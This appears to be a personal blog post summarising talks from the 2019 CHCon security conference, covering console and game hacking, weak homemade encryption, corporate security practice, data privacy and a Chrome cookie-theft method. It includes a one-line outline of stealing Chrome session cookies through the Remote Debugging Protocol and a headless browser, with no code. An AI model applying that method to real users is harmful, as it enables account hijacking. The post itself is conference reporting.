yojimbo

Thoughts that should have a longer lifetime than my Mastodon posts ...

CHCon BEN KNIGHT – CLASSIC PLAYSTATION HACKING, https://2019.chcon.nz/talks/ben/

The PlayStation Classic is a throwback to the original PSX; for the nostalgic types. Sony ships this cheap Linux box with an open source emulator to play 20 original PSX games. But wait, no Crash Team Racing? The PlayStation Classic has been out long enough that there’s plenty of tooling to load more games. But how do the tools work? What’s the hax? Ben will demonstrate the manual exploitation of the vulnerable update process. Flash storage was dumped, UART serial connected and crypto mistakes were made.

  • The box came with the private key embedded. Why???
  • Also sounds like a fun box to play games from, if only I had more inputs on my TV ...

CHCon EDWARD ROBINSON – DISASSEMBLING DIABLO, https://2019.chcon.nz/talks/edward/

In this talk we will go through the fundamentals of game hacking using Diablo 1 to show entertaining examples. We’ll explore what happens when applications trust clients too much and discuss how carefully considering what your own applications interact with can be an eye-opening, and potentially scary, exercise.

  • Single-player games don't worry about their attack surfaces.
  • Cool hacks result in Mods – hello Half-Life and Counter-Strike

CHCon PETE NICHOLLS – BECOMING A SECURITY-CONSCIOUS SOFTWARE COMPANY, https://2019.chcon.nz/talks/pete-nicholls/

How do you adopt best security practices at your software development company? Earlier this year the company I work for decided to get serious about security, and gave me the task of figuring out how to do that. Here’s everything I wished I knew when I started.

  • “Buy, Measure, Bake & Share”
  • Metrics via OKRs (John Doerr, What To Measure)
  • Get buy-in, work out how to measure “improvement”, get everyone involved, and open-source your process
  • Don't dictate, give people tools to be responsible for getting better themselves

CHCon MATTHEW RUFFELL – THE STORY OF THE “UNCRACKABLE” LOCKBOX, AND WHY HACKERS NEED TO WORK ALONGSIDE DEVELOPERS, https://2019.chcon.nz/talks/matthew/

I was scrolling reddit, and a post came up from a developer with their own homemade encryption program. They issued a challenge: break open the time sensitive uncrackable Lockbox, and you will receive 0.02 BTC. Just in it for the entertainment of seeing how bad their encryption was going to be, I had the Lockbox open two hours later. I wrote up a blog post detailing how I managed to break in, and thus started a series of new challenges, each more complicated than the last, as I worked with the developer to strengthen their program. All challenges had the same thing in common: The developer kept making fundamental mistakes when it came to security, and I defeated five of his challenges with simple attacks straight from the security 101 textbook. In this talk, we will reverse engineer five versions of the TimeLock program, review the disassembly of simple vulnerabilities and use our debugger to exploit the program into revealing its secrets.

  • An excellent tale of how someone thought they could write a security-related program without understanding how attacks work, and how they were (co-operatively) educated by simple reverse engineering ...
  • Don't roll your own crypto code
  • Don't trust the machine your code is running on
  • Don't trust “the Internet” to tell the truth

CHCon MICHELLE BURKE – FOR GOOD OR EVIL: WHY DO YOU NEED MY DATA?, https://2019.chcon.nz/talks/michelle/

Our lives are lived increasingly inside the tubes of the internet and our data is flowing freely through it. Some of us have better opsec than others (and our families are probably terrible and don’t even understand what opsec means), but how we build the applications that we use for interacting often collect more than they need to. Are you actually doing the right thing or making the world a little worse?

  • Because too much data are being collected for “no valid purpose”, perhaps you should feel free to provide details that don't uniquely identify you in the same way.
  • Who doesn't like to receive that store voucher addressed to “Dear Princess”, just in time for your seasonal/christmas shopping sprees? You don't have to provide your real details.
  • Because some places that you “trust” make terrible mistakes (https://www.stuff.co.nz/national/health/115586450/new-zealand-depression-website-exposed-test-results-to-thirdparty-companies) and when they say “All user information collected on www.depression.org.nz is non-identifiable – no identifying information eg, names, email addresses etc are collected” they are forgetting your session cookies which link your details from other places.

CHCon “ALEX” – STEALING CHROME COOKIES WITHOUT A PASSWORD, https://2019.chcon.nz/talks/alex/

If you steal someone’s Chrome cookies, you can log in to their accounts on every website they’re logged in to. Normally you need the user’s password to do it, but I found a way to do it without the password. You just need to be able to execute code on their computer. It works by using Chrome’s Remote Debugging Protocol. To my knowledge this is the only way to extract a user’s Chrome cookies without their password, and by far the easiest way. It involves plugging together several extremely forbidden and undocumented Chrome features, as well as figuring out how to speak the websocket protocol stealthily on a victim’s machine. This talk is about how the technique was found, how it works, and what you can do with it.

  • “Alex” (Purplecon organiser) has found a new way to get Google Chrome to give up its cookies, if you can run commands as the targetted user. https://mango.pdf.zone/stealing-chrome-cookies-without-a-password
  • TL;DR – The Remote Debugging Protocol combined with a Headless browser, pointed at the same Profile directory as the user's real GUI browser, will let you extract their secrets.

I've been to three NZ infosec conferences in the last couple of weeks, and I thought that documenting the talks and the notes that I took would be an interesting exercise. I originally put these notes on the internal company wiki, because they paid for me to go :–) but I figured there was no reason not to release them more widely ... So stay tuned for some more posts on the talks from 2019's CHCon, Purplecon and Kawaiicon!